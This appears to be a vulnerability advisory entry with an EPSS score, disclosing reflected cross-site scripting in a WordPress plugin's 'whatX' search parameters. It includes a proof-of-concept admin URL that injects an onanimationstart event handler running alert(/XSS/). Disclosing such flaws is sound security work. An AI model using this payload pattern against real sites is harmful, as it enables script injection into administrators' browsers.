0.001 Low
EPSS
Percentile
43.6%
The plugin does not properly escape the whatX parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=nsp_search&what1;='+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(/XSS/)+x